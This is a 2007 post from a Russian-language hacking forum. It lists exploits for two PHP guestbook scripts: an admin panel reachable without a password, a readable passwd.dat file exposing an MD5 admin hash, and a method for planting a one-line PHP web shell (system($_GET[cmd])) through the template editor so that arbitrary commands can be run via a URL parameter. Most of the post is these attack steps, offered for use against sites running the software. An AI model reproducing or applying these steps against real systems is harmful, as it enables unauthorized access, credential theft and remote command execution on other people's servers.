28.06.2007, 02:27
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Закрытая гостевая книга v 1.0 (websmith)
вход в админку без пароля
Код:
www.site.ru/admin/index.php
гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
_________________
guest v1.1
если криво настроены права то можно прочитать файл с логином и паролем
Код:
www.site.ru/passwd.dat
все это дело выглядит след образом
PHP код:
<?php
$Password['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
?>
логин - admin
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4
заливка шелла выполняеться из админ панели
Код:
http://site.ru/admin.php?design
в поле файла header.inc.php вписываем
PHP код:
<?php system($_GET[cmd]); ?>
и выполняем
Код:
http://site.ru/design/header.inc.php?cmd=команда
Последний раз редактировалось _Pantera_; 28.06.2007 в 02:31..
|
|
|